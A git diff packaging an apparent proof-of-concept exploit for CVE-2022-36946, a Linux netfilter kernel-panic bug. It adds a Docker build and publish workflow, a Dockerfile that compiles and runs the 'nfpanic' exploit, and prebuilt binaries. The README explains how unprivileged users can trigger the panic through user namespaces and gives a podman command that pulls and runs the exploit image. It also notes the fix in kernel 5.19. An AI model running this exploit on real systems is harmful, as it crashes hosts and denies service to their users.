diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml new file mode 100644 index 0000000..9026c78 --- /dev/null +++ b/.github/workflows/docker-image.yml @@ -0,0 +1,53 @@ +name: Create and publish a Docker image + +on: + release: + types: + - published + +env: + REGISTRY: ghcr.io + IMAGE_NAME: ${{ github.repository }} + +jobs: + build-and-push-image: + runs-on: ubuntu-latest + permissions: + contents: read + packages: write + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + - name: Set up QEMU + uses: docker/setup-qemu-action@master + with: + platforms: all + + - name: Set up Docker Buildx + id: buildx + uses: docker/setup-buildx-action@master + + - name: Log in to the Container registry + uses: docker/login-action@v2 + with: + registry: ${{ env.REGISTRY }} + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Extract metadata (tags, labels) for Docker + id: meta + uses: docker/metadata-action@v4 + with: + images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} + + - name: Build and push Docker image + uses: docker/build-push-action@v3 + with: + context: . + builder: ${{ steps.buildx.outputs.name }} + platforms: linux/amd64,linux/arm64 + push: true + tags: ${{ steps.meta.outputs.tags }} + labels: ${{ steps.meta.outputs.labels }} \ No newline at end of file diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..6af30f7 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,9 @@ +FROM debian + +RUN apt-get update +RUN apt-get install -y libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc +WORKDIR /exploit +COPY panic6_podman.c panic6.c + +RUN cc panic6.c -o nfpanic -lmnl -lnetfilter_queue +CMD ["./nfpanic"] diff --git a/README.md b/README.md index 0b1a66f..8f2dd6d 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,22 @@ So, if user truncates the packet below the header size, this skb\_pull() will re Try it executing [this](/panic6.c) c source code. +# Do we *really* need root...? + +Using linux namespaces, in particular user namespaces (enabled via `kernel.unprivileged_userns_clone=1`), a normal user is able +to create a network namespace, enabling them to use the same kernel primitives that trigger the panic. +This will allow you to use the vulnerability without having root. + +This scenario is not uncommon: for example [podman](https://podman.io/) uses this option to run its (rootless) containers, +and on some distros this option is enabled by default. + +You can also try to execute the exploit without root privileges executing: + +```bash +podman run -it --cap-add NET_ADMIN ghcr.io/pwnzer0tt1/cve-2022-36946 +``` + + # Fix up Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) diff --git a/amd64/ip b/amd64/ip new file mode 100644 index 0000000..308f84c Binary files /dev/null and b/amd64/ip differ diff --git a/amd64/iptables b/amd64/iptables new file mode 100644 index 0000000..4b4e809 Binary files /dev/null and b/amd64/iptables differ diff --git a/amd64/ld-linux.so.1 b/amd64/ld-linux.so.1 new file mode 100644 index 0000000..51280a5 Binary files /dev/null and b/amd64/ld-linux.so.1 differ diff --git a/amd64/libbpf.so.1 b/amd64/libbpf.so.1 new file mode 100644 index 0000000..3010507 Binary files /dev/null and b/amd64/libbpf.so.1 differ diff --git a/amd64/libc.so.6 b/amd64/libc.so.6 new file mode 100644 index 0000000..0aeb35f Binary files /dev/null and b/amd64/libc.so.6 differ diff --git a/amd64/libcap.so.2 b/amd64/libcap.so.2 new file mode 100644 index 0000000..2a4c84e Binary files /dev/null and b/amd64/libcap.so.2 differ diff --git a/amd64/libelf.so.1 b/amd64/libelf.so.1 new file mode 100644 index 0000000..c0bab2c Binary files /dev/null and b/amd64/libelf.so.1 differ diff --git a/amd64/libgcc_s.so.1 b/amd64/libgcc_s.so.1 new file mode 100644 index 0000000..14c397f Binary files /dev/null and b/amd64/libgcc_s.so.1 differ diff --git a/amd64/libm.so.6 b/amd64/libm.so.6 new file mode 100644 index 0000000..2409d16 Binary files /dev/null and b/amd64/libm.so.6 differ diff --git a/amd64/libmnl.so.0 b/amd64/libmnl.so.0 new file mode 100644 index 0000000..f0b4324 Binary files /dev/null and b/amd64/libmnl.so.0 differ diff --git a/amd64/libnetfilter_queue.so.1 b/amd64/libnetfilter_queue.so.1 new file mode 100644 index 0000000..6666931 Binary files /dev/null and b/amd64/libnetfilter_queue.so.1 differ diff --git a/amd64/libnfnetlink.so.0 b/amd64/libnfnetlink.so.0 new file mode 100644 index 0000000..93b45a7 Binary files /dev/null and b/amd64/libnfnetlink.so.0 differ diff --git a/amd64/libnftnl.so.11 b/amd64/libnftnl.so.11 new file mode 100644 index 0000000..863d4ff Binary files /dev/null and b/amd64/libnftnl.so.11 differ diff --git a/amd64/libstdc++.so.6 b/amd64/libstdc++.so.6 new file mode 100644 index 0000000..6978bfe Binary files /dev/null and b/amd64/libstdc++.so.6 differ diff --git a/amd64/libxtables.so.12 b/amd64/libxtables.so.12 new file mode 100644 index 0000000..3de4015 Binary files /dev/null and b/amd64/libxtables.so.12 differ diff --git a/amd64/libz.so.1 b/amd64/libz.so.1 new file mode 100644 index 0000000..81c44ef Binary files /dev/null and b/amd64/libz.so.1 differ diff --git a/amd64/libzstd.so.1 b/amd64/libzstd.so.1 new file mode 100644 index 0000000..a622519 Binary files /dev/null and b/amd64/libzstd.so.1 differ diff --git a/amd64/nfpanic b/amd64/nfpanic new file mode 100644 index 0000000..e07f077 Binary files /dev/null and b/amd64/nfpanic differ diff --git a/amd64/xtables/libarpt_mangle.so b/amd64/xtables/libarpt_mangle.so new file mode 100644 index 0000000..e7d528d Binary files /dev/null and b/amd64/xtables/libarpt_mangle.so differ diff --git a/amd64/xtables/libebt_802_3.so b/amd64/xtables/libebt_802_3.so new file mode 100644 index 0000000..6775f26 Binary files /dev/null and b/amd64/xtables/libebt_802_3.so differ diff --git a/amd64/xtables/libebt_among.so b/amd64/xtables/libebt_among.so new file mode 100644 index 0000000..faa9f69 Binary files /dev/null and b/amd64/xtables/libebt_among.so differ diff --git a/amd64/xtables/libebt_arp.so b/amd64/xtables/libebt_arp.so new file mode 100644 index 0000000..ee611d0 Binary files /dev/null and b/amd64/xtables/libebt_arp.so differ diff --git a/amd64/xtables/libebt_arpreply.so b/amd64/xtables/libebt_arpreply.so new file mode 100644 index 0000000..01613d0 Binary files /dev/null and b/amd64/xtables/libebt_arpreply.so differ diff --git a/amd64/xtables/libebt_dnat.so b/amd64/xtables/libebt_dnat.so new file mode 100644 index 0000000..59766f6 Binary files /dev/null and b/amd64/xtables/libebt_dnat.so differ diff --git a/amd64/xtables/libebt_ip.so b/amd64/xtables/libebt_ip.so new file mode 100644 index 0000000..0f7d40e Binary files /dev/null and b/amd64/xtables/libebt_ip.so differ diff --git a/amd64/xtables/libebt_ip6.so b/amd64/xtables/libebt_ip6.so new file mode 100644 index 0000000..111627e Binary files /dev/null and b/amd64/xtables/libebt_ip6.so differ diff --git a/amd64/xtables/libebt_log.so b/amd64/xtables/libebt_log.so new file mode 100644 index 0000000..38531ed Binary files /dev/null and b/amd64/xtables/libebt_log.so differ diff --git a/amd64/xtables/libebt_mark.so b/amd64/xtables/libebt_mark.so new file mode 100644 index 0000000..e03d0d3 Binary files /dev/null and b/amd64/xtables/libebt_mark.so differ diff --git a/amd64/xtables/libebt_mark_m.so b/amd64/xtables/libebt_mark_m.so new file mode 100644 index 0000000..97d63c7 Binary files /dev/null and b/amd64/xtables/libebt_mark_m.so differ diff --git a/amd64/xtables/libebt_nflog.so b/amd64/xtables/libebt_nflog.so new file mode 100644 index 0000000..43d9e30 Binary files /dev/null and b/amd64/xtables/libebt_nflog.so differ diff --git a/amd64/xtables/libebt_pkttype.so b/amd64/xtables/libebt_pkttype.so new file mode 100644 index 0000000..788a199 Binary files /dev/null and b/amd64/xtables/libebt_pkttype.so differ diff --git a/amd64/xtables/libebt_redirect.so b/amd64/xtables/libebt_redirect.so new file mode 100644 index 0000000..3268cd5 Binary files /dev/null and b/amd64/xtables/libebt_redirect.so differ diff --git a/amd64/xtables/libebt_snat.so b/amd64/xtables/libebt_snat.so new file mode 100644 index 0000000..b984ba2 Binary files /dev/null and b/amd64/xtables/libebt_snat.so differ diff --git a/amd64/xtables/libebt_stp.so b/amd64/xtables/libebt_stp.so new file mode 100644 index 0000000..a21cd23 Binary files /dev/null and b/amd64/xtables/libebt_stp.so differ diff --git a/amd64/xtables/libebt_vlan.so b/amd64/xtables/libebt_vlan.so new file mode 100644 index 0000000..486c3eb Binary files /dev/null and b/amd64/xtables/libebt_vlan.so differ diff --git a/amd64/xtables/libip6t_DNPT.so b/amd64/xtables/libip6t_DNPT.so new file mode 100644 index 0000000..bcf8e38 Binary files /dev/null and b/amd64/xtables/libip6t_DNPT.so differ diff --git a/amd64/xtables/libip6t_HL.so b/amd64/xtables/libip6t_HL.so new file mode 100644 index 0000000..29220e2 Binary files /dev/null and b/amd64/xtables/libip6t_HL.so differ diff --git a/amd64/xtables/libip6t_NETMAP.so b/amd64/xtables/libip6t_NETMAP.so new file mode 100644 index 0000000..a058c2c Binary files /dev/null and b/amd64/xtables/libip6t_NETMAP.so differ diff --git a/amd64/xtables/libip6t_REJECT.so b/amd64/xtables/libip6t_REJECT.so new file mode 100644 index 0000000..d07b06b Binary files /dev/null and b/amd64/xtables/libip6t_REJECT.so differ diff --git a/amd64/xtables/libip6t_SNPT.so b/amd64/xtables/libip6t_SNPT.so new file mode 100644 index 0000000..46809f4 Binary files /dev/null and b/amd64/xtables/libip6t_SNPT.so differ diff --git a/amd64/xtables/libip6t_ah.so b/amd64/xtables/libip6t_ah.so new file mode 100644 index 0000000..4b68cdd Binary files /dev/null and b/amd64/xtables/libip6t_ah.so differ diff --git a/amd64/xtables/libip6t_dst.so b/amd64/xtables/libip6t_dst.so new file mode 100644 index 0000000..a558444 Binary files /dev/null and b/amd64/xtables/libip6t_dst.so differ diff --git a/amd64/xtables/libip6t_eui64.so b/amd64/xtables/libip6t_eui64.so new file mode 100644 index 0000000..2259234 Binary files /dev/null and b/amd64/xtables/libip6t_eui64.so differ diff --git a/amd64/xtables/libip6t_frag.so b/amd64/xtables/libip6t_frag.so new file mode 100644 index 0000000..0da67d6 Binary files /dev/null and b/amd64/xtables/libip6t_frag.so differ diff --git a/amd64/xtables/libip6t_hbh.so b/amd64/xtables/libip6t_hbh.so new file mode 100644 index 0000000..ad333cd Binary files /dev/null and b/amd64/xtables/libip6t_hbh.so differ diff --git a/amd64/xtables/libip6t_icmp6.so b/amd64/xtables/libip6t_icmp6.so new file mode 100644 index 0000000..2da91a0 Binary files /dev/null and b/amd64/xtables/libip6t_icmp6.so differ diff --git a/amd64/xtables/libip6t_ipv6header.so b/amd64/xtables/libip6t_ipv6header.so new file mode 100644 index 0000000..daef396 Binary files /dev/null and b/amd64/xtables/libip6t_ipv6header.so differ diff --git a/amd64/xtables/libip6t_mh.so b/amd64/xtables/libip6t_mh.so new file mode 100644 index 0000000..b3e83cc Binary files /dev/null and b/amd64/xtables/libip6t_mh.so differ diff --git a/amd64/xtables/libip6t_rt.so b/amd64/xtables/libip6t_rt.so new file mode 100644 index 0000000..b71473e Binary files /dev/null and b/amd64/xtables/libip6t_rt.so differ diff --git a/amd64/xtables/libip6t_srh.so b/amd64/xtables/libip6t_srh.so new file mode 100644 index 0000000..820c6cf Binary files /dev/null and b/amd64/xtables/libip6t_srh.so differ diff --git a/amd64/xtables/libipt_CLUSTERIP.so b/amd64/xtables/libipt_CLUSTERIP.so new file mode 100644 index 0000000..5c88bb1 Binary files /dev/null and b/amd64/xtables/libipt_CLUSTERIP.so differ diff --git a/amd64/xtables/libipt_ECN.so b/amd64/xtables/libipt_ECN.so new file mode 100644 index 0000000..d77b301 Binary files /dev/null and b/amd64/xtables/libipt_ECN.so differ diff --git a/amd64/xtables/libipt_NETMAP.so b/amd64/xtables/libipt_NETMAP.so new file mode 100644 index 0000000..49ec5a1 Binary files /dev/null and b/amd64/xtables/libipt_NETMAP.so differ diff --git a/amd64/xtables/libipt_REJECT.so b/amd64/xtables/libipt_REJECT.so new file mode 100644 index 0000000..6b104a2 Binary files /dev/null and b/amd64/xtables/libipt_REJECT.so differ diff --git a/amd64/xtables/libipt_TTL.so b/amd64/xtables/libipt_TTL.so new file mode 100644 index 0000000..96db941 Binary files /dev/null and b/amd64/xtables/libipt_TTL.so differ diff --git a/amd64/xtables/libipt_ULOG.so b/amd64/xtables/libipt_ULOG.so new file mode 100644 index 0000000..c626901 Binary files /dev/null and b/amd64/xtables/libipt_ULOG.so differ diff --git a/amd64/xtables/libipt_ah.so b/amd64/xtables/libipt_ah.so new file mode 100644 index 0000000..eea713b Binary files /dev/null and b/amd64/xtables/libipt_ah.so differ diff --git a/amd64/xtables/libipt_icmp.so b/amd64/xtables/libipt_icmp.so new file mode 100644 index 0000000..ee3415e Binary files /dev/null and b/amd64/xtables/libipt_icmp.so differ diff --git a/amd64/xtables/libipt_realm.so b/amd64/xtables/libipt_realm.so new file mode 100644 index 0000000..1511153 Binary files /dev/null and b/amd64/xtables/libipt_realm.so differ diff --git a/amd64/xtables/libxt_AUDIT.so b/amd64/xtables/libxt_AUDIT.so new file mode 100644 index 0000000..c98043e Binary files /dev/null and b/amd64/xtables/libxt_AUDIT.so differ diff --git a/amd64/xtables/libxt_CHECKSUM.so b/amd64/xtables/libxt_CHECKSUM.so new file mode 100644 index 0000000..e3ea7aa Binary files /dev/null and b/amd64/xtables/libxt_CHECKSUM.so differ diff --git a/amd64/xtables/libxt_CLASSIFY.so b/amd64/xtables/libxt_CLASSIFY.so new file mode 100644 index 0000000..07b1632 Binary files /dev/null and b/amd64/xtables/libxt_CLASSIFY.so differ diff --git a/amd64/xtables/libxt_CONNMARK.so b/amd64/xtables/libxt_CONNMARK.so new file mode 100644 index 0000000..1506856 Binary files /dev/null and b/amd64/xtables/libxt_CONNMARK.so differ diff --git a/amd64/xtables/libxt_CONNSECMARK.so b/amd64/xtables/libxt_CONNSECMARK.so new file mode 100644 index 0000000..3286561 Binary files /dev/null and b/amd64/xtables/libxt_CONNSECMARK.so differ diff --git a/amd64/xtables/libxt_CT.so b/amd64/xtables/libxt_CT.so new file mode 100644 index 0000000..8617ddf Binary files /dev/null and b/amd64/xtables/libxt_CT.so differ diff --git a/amd64/xtables/libxt_DNAT.so b/amd64/xtables/libxt_DNAT.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_DNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_DSCP.so b/amd64/xtables/libxt_DSCP.so new file mode 100644 index 0000000..4ced6d3 Binary files /dev/null and b/amd64/xtables/libxt_DSCP.so differ diff --git a/amd64/xtables/libxt_HMARK.so b/amd64/xtables/libxt_HMARK.so new file mode 100644 index 0000000..d1924de Binary files /dev/null and b/amd64/xtables/libxt_HMARK.so differ diff --git a/amd64/xtables/libxt_IDLETIMER.so b/amd64/xtables/libxt_IDLETIMER.so new file mode 100644 index 0000000..db9ced0 Binary files /dev/null and b/amd64/xtables/libxt_IDLETIMER.so differ diff --git a/amd64/xtables/libxt_LED.so b/amd64/xtables/libxt_LED.so new file mode 100644 index 0000000..ca32cb2 Binary files /dev/null and b/amd64/xtables/libxt_LED.so differ diff --git a/amd64/xtables/libxt_LOG.so b/amd64/xtables/libxt_LOG.so new file mode 100644 index 0000000..3491c51 Binary files /dev/null and b/amd64/xtables/libxt_LOG.so differ diff --git a/amd64/xtables/libxt_MARK.so b/amd64/xtables/libxt_MARK.so new file mode 100644 index 0000000..4fd4615 Binary files /dev/null and b/amd64/xtables/libxt_MARK.so differ diff --git a/amd64/xtables/libxt_MASQUERADE.so b/amd64/xtables/libxt_MASQUERADE.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_MASQUERADE.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_NAT.so b/amd64/xtables/libxt_NAT.so new file mode 100644 index 0000000..bd906ac Binary files /dev/null and b/amd64/xtables/libxt_NAT.so differ diff --git a/amd64/xtables/libxt_NFLOG.so b/amd64/xtables/libxt_NFLOG.so new file mode 100644 index 0000000..b461a06 Binary files /dev/null and b/amd64/xtables/libxt_NFLOG.so differ diff --git a/amd64/xtables/libxt_NFQUEUE.so b/amd64/xtables/libxt_NFQUEUE.so new file mode 100644 index 0000000..b13c1c8 Binary files /dev/null and b/amd64/xtables/libxt_NFQUEUE.so differ diff --git a/amd64/xtables/libxt_NOTRACK.so b/amd64/xtables/libxt_NOTRACK.so new file mode 100644 index 0000000..e97684d --- /dev/null +++ b/amd64/xtables/libxt_NOTRACK.so @@ -0,0 +1 @@ +libxt_CT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_RATEEST.so b/amd64/xtables/libxt_RATEEST.so new file mode 100644 index 0000000..f8777c8 Binary files /dev/null and b/amd64/xtables/libxt_RATEEST.so differ diff --git a/amd64/xtables/libxt_REDIRECT.so b/amd64/xtables/libxt_REDIRECT.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_REDIRECT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_SECMARK.so b/amd64/xtables/libxt_SECMARK.so new file mode 100644 index 0000000..94e3766 Binary files /dev/null and b/amd64/xtables/libxt_SECMARK.so differ diff --git a/amd64/xtables/libxt_SET.so b/amd64/xtables/libxt_SET.so new file mode 100644 index 0000000..e5d2995 Binary files /dev/null and b/amd64/xtables/libxt_SET.so differ diff --git a/amd64/xtables/libxt_SNAT.so b/amd64/xtables/libxt_SNAT.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_SNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_SYNPROXY.so b/amd64/xtables/libxt_SYNPROXY.so new file mode 100644 index 0000000..0f2590a Binary files /dev/null and b/amd64/xtables/libxt_SYNPROXY.so differ diff --git a/amd64/xtables/libxt_TCPMSS.so b/amd64/xtables/libxt_TCPMSS.so new file mode 100644 index 0000000..e52edf3 Binary files /dev/null and b/amd64/xtables/libxt_TCPMSS.so differ diff --git a/amd64/xtables/libxt_TCPOPTSTRIP.so b/amd64/xtables/libxt_TCPOPTSTRIP.so new file mode 100644 index 0000000..1b10e97 Binary files /dev/null and b/amd64/xtables/libxt_TCPOPTSTRIP.so differ diff --git a/amd64/xtables/libxt_TEE.so b/amd64/xtables/libxt_TEE.so new file mode 100644 index 0000000..2e1274a Binary files /dev/null and b/amd64/xtables/libxt_TEE.so differ diff --git a/amd64/xtables/libxt_TOS.so b/amd64/xtables/libxt_TOS.so new file mode 100644 index 0000000..1aa016e Binary files /dev/null and b/amd64/xtables/libxt_TOS.so differ diff --git a/amd64/xtables/libxt_TPROXY.so b/amd64/xtables/libxt_TPROXY.so new file mode 100644 index 0000000..711159c Binary files /dev/null and b/amd64/xtables/libxt_TPROXY.so differ diff --git a/amd64/xtables/libxt_TRACE.so b/amd64/xtables/libxt_TRACE.so new file mode 100644 index 0000000..b8fa7b9 Binary files /dev/null and b/amd64/xtables/libxt_TRACE.so differ diff --git a/amd64/xtables/libxt_addrtype.so b/amd64/xtables/libxt_addrtype.so new file mode 100644 index 0000000..5a48197 Binary files /dev/null and b/amd64/xtables/libxt_addrtype.so differ diff --git a/amd64/xtables/libxt_bpf.so b/amd64/xtables/libxt_bpf.so new file mode 100644 index 0000000..0ec9320 Binary files /dev/null and b/amd64/xtables/libxt_bpf.so differ diff --git a/amd64/xtables/libxt_cgroup.so b/amd64/xtables/libxt_cgroup.so new file mode 100644 index 0000000..6ec4af3 Binary files /dev/null and b/amd64/xtables/libxt_cgroup.so differ diff --git a/amd64/xtables/libxt_cluster.so b/amd64/xtables/libxt_cluster.so new file mode 100644 index 0000000..3d82a12 Binary files /dev/null and b/amd64/xtables/libxt_cluster.so differ diff --git a/amd64/xtables/libxt_comment.so b/amd64/xtables/libxt_comment.so new file mode 100644 index 0000000..0b6dc7b Binary files /dev/null and b/amd64/xtables/libxt_comment.so differ diff --git a/amd64/xtables/libxt_connbytes.so b/amd64/xtables/libxt_connbytes.so new file mode 100644 index 0000000..a10c59d Binary files /dev/null and b/amd64/xtables/libxt_connbytes.so differ diff --git a/amd64/xtables/libxt_connlabel.so b/amd64/xtables/libxt_connlabel.so new file mode 100644 index 0000000..d01a4e9 Binary files /dev/null and b/amd64/xtables/libxt_connlabel.so differ diff --git a/amd64/xtables/libxt_connlimit.so b/amd64/xtables/libxt_connlimit.so new file mode 100644 index 0000000..14f02e8 Binary files /dev/null and b/amd64/xtables/libxt_connlimit.so differ diff --git a/amd64/xtables/libxt_conntrack.so b/amd64/xtables/libxt_conntrack.so new file mode 100644 index 0000000..03ac4f1 Binary files /dev/null and b/amd64/xtables/libxt_conntrack.so differ diff --git a/amd64/xtables/libxt_cpu.so b/amd64/xtables/libxt_cpu.so new file mode 100644 index 0000000..22c0a6c Binary files /dev/null and b/amd64/xtables/libxt_cpu.so differ diff --git a/amd64/xtables/libxt_dccp.so b/amd64/xtables/libxt_dccp.so new file mode 100644 index 0000000..1162140 Binary files /dev/null and b/amd64/xtables/libxt_dccp.so differ diff --git a/amd64/xtables/libxt_devgroup.so b/amd64/xtables/libxt_devgroup.so new file mode 100644 index 0000000..5f8cefc Binary files /dev/null and b/amd64/xtables/libxt_devgroup.so differ diff --git a/amd64/xtables/libxt_ecn.so b/amd64/xtables/libxt_ecn.so new file mode 100644 index 0000000..e8786ee Binary files /dev/null and b/amd64/xtables/libxt_ecn.so differ diff --git a/amd64/xtables/libxt_esp.so b/amd64/xtables/libxt_esp.so new file mode 100644 index 0000000..d2355ac Binary files /dev/null and b/amd64/xtables/libxt_esp.so differ diff --git a/amd64/xtables/libxt_hashlimit.so b/amd64/xtables/libxt_hashlimit.so new file mode 100644 index 0000000..5ed6d91 Binary files /dev/null and b/amd64/xtables/libxt_hashlimit.so differ diff --git a/amd64/xtables/libxt_helper.so b/amd64/xtables/libxt_helper.so new file mode 100644 index 0000000..42a17cb Binary files /dev/null and b/amd64/xtables/libxt_helper.so differ diff --git a/amd64/xtables/libxt_ipcomp.so b/amd64/xtables/libxt_ipcomp.so new file mode 100644 index 0000000..b380f20 Binary files /dev/null and b/amd64/xtables/libxt_ipcomp.so differ diff --git a/amd64/xtables/libxt_iprange.so b/amd64/xtables/libxt_iprange.so new file mode 100644 index 0000000..7f1f9ed Binary files /dev/null and b/amd64/xtables/libxt_iprange.so differ diff --git a/amd64/xtables/libxt_ipvs.so b/amd64/xtables/libxt_ipvs.so new file mode 100644 index 0000000..33606e3 Binary files /dev/null and b/amd64/xtables/libxt_ipvs.so differ diff --git a/amd64/xtables/libxt_length.so b/amd64/xtables/libxt_length.so new file mode 100644 index 0000000..6f86abf Binary files /dev/null and b/amd64/xtables/libxt_length.so differ diff --git a/amd64/xtables/libxt_limit.so b/amd64/xtables/libxt_limit.so new file mode 100644 index 0000000..c7c86ce Binary files /dev/null and b/amd64/xtables/libxt_limit.so differ diff --git a/amd64/xtables/libxt_mac.so b/amd64/xtables/libxt_mac.so new file mode 100644 index 0000000..3af78e4 Binary files /dev/null and b/amd64/xtables/libxt_mac.so differ diff --git a/amd64/xtables/libxt_multiport.so b/amd64/xtables/libxt_multiport.so new file mode 100644 index 0000000..61ac822 Binary files /dev/null and b/amd64/xtables/libxt_multiport.so differ diff --git a/amd64/xtables/libxt_nfacct.so b/amd64/xtables/libxt_nfacct.so new file mode 100644 index 0000000..d299b73 Binary files /dev/null and b/amd64/xtables/libxt_nfacct.so differ diff --git a/amd64/xtables/libxt_osf.so b/amd64/xtables/libxt_osf.so new file mode 100644 index 0000000..5e286f1 Binary files /dev/null and b/amd64/xtables/libxt_osf.so differ diff --git a/amd64/xtables/libxt_owner.so b/amd64/xtables/libxt_owner.so new file mode 100644 index 0000000..69078da Binary files /dev/null and b/amd64/xtables/libxt_owner.so differ diff --git a/amd64/xtables/libxt_physdev.so b/amd64/xtables/libxt_physdev.so new file mode 100644 index 0000000..3900e77 Binary files /dev/null and b/amd64/xtables/libxt_physdev.so differ diff --git a/amd64/xtables/libxt_pkttype.so b/amd64/xtables/libxt_pkttype.so new file mode 100644 index 0000000..22a33fb Binary files /dev/null and b/amd64/xtables/libxt_pkttype.so differ diff --git a/amd64/xtables/libxt_policy.so b/amd64/xtables/libxt_policy.so new file mode 100644 index 0000000..a73c7bd Binary files /dev/null and b/amd64/xtables/libxt_policy.so differ diff --git a/amd64/xtables/libxt_quota.so b/amd64/xtables/libxt_quota.so new file mode 100644 index 0000000..03b1f9a Binary files /dev/null and b/amd64/xtables/libxt_quota.so differ diff --git a/amd64/xtables/libxt_recent.so b/amd64/xtables/libxt_recent.so new file mode 100644 index 0000000..7ce05bc Binary files /dev/null and b/amd64/xtables/libxt_recent.so differ diff --git a/amd64/xtables/libxt_rpfilter.so b/amd64/xtables/libxt_rpfilter.so new file mode 100644 index 0000000..7c17c2a Binary files /dev/null and b/amd64/xtables/libxt_rpfilter.so differ diff --git a/amd64/xtables/libxt_sctp.so b/amd64/xtables/libxt_sctp.so new file mode 100644 index 0000000..c9f6bf8 Binary files /dev/null and b/amd64/xtables/libxt_sctp.so differ diff --git a/amd64/xtables/libxt_socket.so b/amd64/xtables/libxt_socket.so new file mode 100644 index 0000000..6be6a5c Binary files /dev/null and b/amd64/xtables/libxt_socket.so differ diff --git a/amd64/xtables/libxt_standard.so b/amd64/xtables/libxt_standard.so new file mode 100644 index 0000000..54860a0 Binary files /dev/null and b/amd64/xtables/libxt_standard.so differ diff --git a/amd64/xtables/libxt_state.so b/amd64/xtables/libxt_state.so new file mode 100644 index 0000000..24417c2 --- /dev/null +++ b/amd64/xtables/libxt_state.so @@ -0,0 +1 @@ +libxt_conntrack.so \ No newline at end of file diff --git a/amd64/xtables/libxt_statistic.so b/amd64/xtables/libxt_statistic.so new file mode 100644 index 0000000..549a26b Binary files /dev/null and b/amd64/xtables/libxt_statistic.so differ diff --git a/amd64/xtables/libxt_string.so b/amd64/xtables/libxt_string.so new file mode 100644 index 0000000..bf48cd4 Binary files /dev/null and b/amd64/xtables/libxt_string.so differ diff --git a/amd64/xtables/libxt_tcp.so b/amd64/xtables/libxt_tcp.so new file mode 100644 index 0000000..fbbe64b Binary files /dev/null and b/amd64/xtables/libxt_tcp.so differ diff --git a/amd64/xtables/libxt_time.so b/amd64/xtables/libxt_time.so new file mode 100644 index 0000000..ea8c078 Binary files /dev/null and b/amd64/xtables/libxt_time.so differ diff --git a/amd64/xtables/libxt_u32.so b/amd64/xtables/libxt_u32.so new file mode 100644 index 0000000..da649e4 Binary files /dev/null and b/amd64/xtables/libxt_u32.so differ diff --git a/amd64/xtables/libxt_udp.so b/amd64/xtables/libxt_udp.so new file mode 100644 index 0000000..f5e5c28 Binary files /dev/null and b/amd64/xtables/libxt_udp.so differ diff --git a/arm64/ip b/arm64/ip new file mode 100755 index 0000000..9a8e1e8 Binary files /dev/null and b/arm64/ip differ diff --git a/arm64/iptables b/arm64/iptables new file mode 100755 index 0000000..a794db7 Binary files /dev/null and b/arm64/iptables differ diff --git a/arm64/ld-linux.so.1 b/arm64/ld-linux.so.1 new file mode 100755 index 0000000..df59b82 Binary files /dev/null and b/arm64/ld-linux.so.1 differ diff --git a/arm64/libbpf.so.0 b/arm64/libbpf.so.0 new file mode 100644 index 0000000..c498451 Binary files /dev/null and b/arm64/libbpf.so.0 differ diff --git a/arm64/libbsd.so.0 b/arm64/libbsd.so.0 new file mode 100644 index 0000000..dfdaa56 Binary files /dev/null and b/arm64/libbsd.so.0 differ diff --git a/arm64/libc.so.6 b/arm64/libc.so.6 new file mode 100644 index 0000000..ecf9fe7 Binary files /dev/null and b/arm64/libc.so.6 differ diff --git a/arm64/libcap.so.2 b/arm64/libcap.so.2 new file mode 100644 index 0000000..24c8dde Binary files /dev/null and b/arm64/libcap.so.2 differ diff --git a/arm64/libelf.so.1 b/arm64/libelf.so.1 new file mode 100644 index 0000000..be16836 Binary files /dev/null and b/arm64/libelf.so.1 differ diff --git a/arm64/libmd.so.0 b/arm64/libmd.so.0 new file mode 100644 index 0000000..c2e328c Binary files /dev/null and b/arm64/libmd.so.0 differ diff --git a/arm64/libmnl.so.0 b/arm64/libmnl.so.0 new file mode 100644 index 0000000..618dfc5 Binary files /dev/null and b/arm64/libmnl.so.0 differ diff --git a/arm64/libnetfilter_queue.so.1 b/arm64/libnetfilter_queue.so.1 new file mode 100644 index 0000000..d5fd367 Binary files /dev/null and b/arm64/libnetfilter_queue.so.1 differ diff --git a/arm64/libnfnetlink.so.0 b/arm64/libnfnetlink.so.0 new file mode 100644 index 0000000..9acc567 Binary files /dev/null and b/arm64/libnfnetlink.so.0 differ diff --git a/arm64/libnftnl.so.11 b/arm64/libnftnl.so.11 new file mode 100644 index 0000000..f2949ba Binary files /dev/null and b/arm64/libnftnl.so.11 differ diff --git a/arm64/libxtables.so.12 b/arm64/libxtables.so.12 new file mode 100644 index 0000000..d1ed04d Binary files /dev/null and b/arm64/libxtables.so.12 differ diff --git a/arm64/libz.so.1 b/arm64/libz.so.1 new file mode 100644 index 0000000..6e09321 Binary files /dev/null and b/arm64/libz.so.1 differ diff --git a/arm64/nfpanic b/arm64/nfpanic new file mode 100755 index 0000000..9d7c046 Binary files /dev/null and b/arm64/nfpanic differ diff --git a/arm64/xtables/libarpt_mangle.so b/arm64/xtables/libarpt_mangle.so new file mode 100644 index 0000000..86447fa Binary files /dev/null and b/arm64/xtables/libarpt_mangle.so differ diff --git a/arm64/xtables/libebt_802_3.so b/arm64/xtables/libebt_802_3.so new file mode 100644 index 0000000..cf35442 Binary files /dev/null and b/arm64/xtables/libebt_802_3.so differ diff --git a/arm64/xtables/libebt_among.so 